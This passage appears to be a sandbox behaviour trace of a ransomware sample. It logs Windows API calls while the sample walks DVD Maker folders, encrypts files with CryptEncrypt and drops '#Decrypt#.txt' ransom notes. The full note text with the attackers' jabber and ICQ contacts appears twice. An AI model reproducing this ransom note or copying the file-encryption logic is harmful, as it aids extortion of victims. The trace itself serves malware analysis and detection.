Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png") returned 90 [0251.976] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.976] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.976] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.976] lstrlenW (lpString=".testttjffg") returned 11 [0251.976] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.976] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.976] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.977] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f909a8f, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f909a8f, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.977] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.977] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png") returned 96 [0251.977] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.977] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.977] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.977] lstrlenW (lpString=".testttjffg") returned 11 [0251.977] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.977] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.977] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.977] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.977] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.977] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.977] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png") returned 87 [0251.978] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.978] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.978] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.978] lstrlenW (lpString=".testttjffg") returned 11 [0251.978] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.978] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.978] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.978] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.978] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f8bd7d5, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f8bd7d5, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.978] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.978] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png") returned 93 [0251.979] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.979] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.979] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.979] lstrlenW (lpString=".testttjffg") returned 11 [0251.979] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.979] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.979] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.979] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.979] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f84b3be, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f84b3be, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x6c2b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="softedges.png", cAlternateFileName="")) returned 1 [0251.979] lstrcmpiW (lpString1="softedges.png", lpString2="Windows") returned -1 [0251.979] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png") returned 70 [0251.979] StrStrIW (lpFirst="softedges.png", lpSrch=".horseleader") returned 0x0 [0251.979] lstrcmpW (lpString1="softedges.png", lpString2="#Decrypt#.txt") returned 1 [0251.980] lstrcmpW (lpString1="softedges.png", lpString2="_uninstalling_.png") returned 1 [0251.980] lstrlenW (lpString=".testttjffg") returned 11 [0251.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png", lpSrch=".testttjffg") returned 0x0 [0251.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.980] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\softedges.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\softedges.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.980] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f897678, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f897678, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xdcdf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="vignettemask25.png", cAlternateFileName="")) returned 1 [0251.980] lstrcmpiW (lpString1="vignettemask25.png", lpString2="Windows") returned -1 [0251.980] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png") returned 75 [0251.980] StrStrIW (lpFirst="vignettemask25.png", lpSrch=".horseleader") returned 0x0 [0251.980] lstrcmpW (lpString1="vignettemask25.png", lpString2="#Decrypt#.txt") returned 1 [0251.980] lstrcmpW (lpString1="vignettemask25.png", lpString2="_uninstalling_.png") returned 1 [0251.980] lstrlenW (lpString=".testttjffg") returned 11 [0251.980] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png", lpSrch=".testttjffg") returned 0x0 [0251.980] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.980] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\vignettemask25.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\vignettemask25.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whiteband.png", cAlternateFileName="")) returned 1 [0251.981] lstrcmpiW (lpString1="whiteband.png", lpString2="Windows") returned -1 [0251.981] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png") returned 70 [0251.981] StrStrIW (lpFirst="whiteband.png", lpSrch=".horseleader") returned 0x0 [0251.981] lstrcmpW (lpString1="whiteband.png", lpString2="#Decrypt#.txt") returned 1 [0251.981] lstrcmpW (lpString1="whiteband.png", lpString2="_uninstalling_.png") returned 1 [0251.981] lstrlenW (lpString=".testttjffg") returned 11 [0251.981] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png", lpSrch=".testttjffg") returned 0x0 [0251.981] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.981] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.981] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\whiteband.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\whiteband.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.981] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f87151b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f87151b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x1c5d, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="whiteband.png", cAlternateFileName="")) returned 0 [0251.982] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.983] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\#Decrypt#.txt") returned 70 [0251.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Vignette\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\vignette\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.984] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.985] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0251.989] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0251.989] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0251.989] CloseHandle (hObject=0x158) returned 1 [0251.989] GetProcessHeap () returned 0x780000 [0251.989] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc820 | out: hHeap=0x780000) returned 1 [0251.989] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WhiteDot.png", cAlternateFileName="")) returned 1 [0251.989] lstrcmpiW (lpString1="WhiteDot.png", lpString2="Windows") returned -1 [0251.989] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png") returned 60 [0251.989] StrStrIW (lpFirst="WhiteDot.png", lpSrch=".horseleader") returned 0x0 [0251.989] lstrcmpW (lpString1="WhiteDot.png", lpString2="#Decrypt#.txt") returned 1 [0251.989] lstrcmpW (lpString1="WhiteDot.png", lpString2="_uninstalling_.png") returned 1 [0251.989] lstrlenW (lpString=".testttjffg") returned 11 [0251.989] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png", lpSrch=".testttjffg") returned 0x0 [0251.989] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0251.990] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0251.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\WhiteDot.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\whitedot.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.990] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ee53867, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6ee53867, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x554cdacf, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5caa, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="WhiteDot.png", cAlternateFileName="")) returned 0 [0251.990] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0251.990] wnsprintfW (in: pszDest=0x79b628, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\#Decrypt#.txt") returned 61 [0251.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0251.991] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0251.991] WriteFile (in: hFile=0x21c, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aee10, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aee10*=0x5e4, lpOverlapped=0x0) returned 1 [0251.993] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOw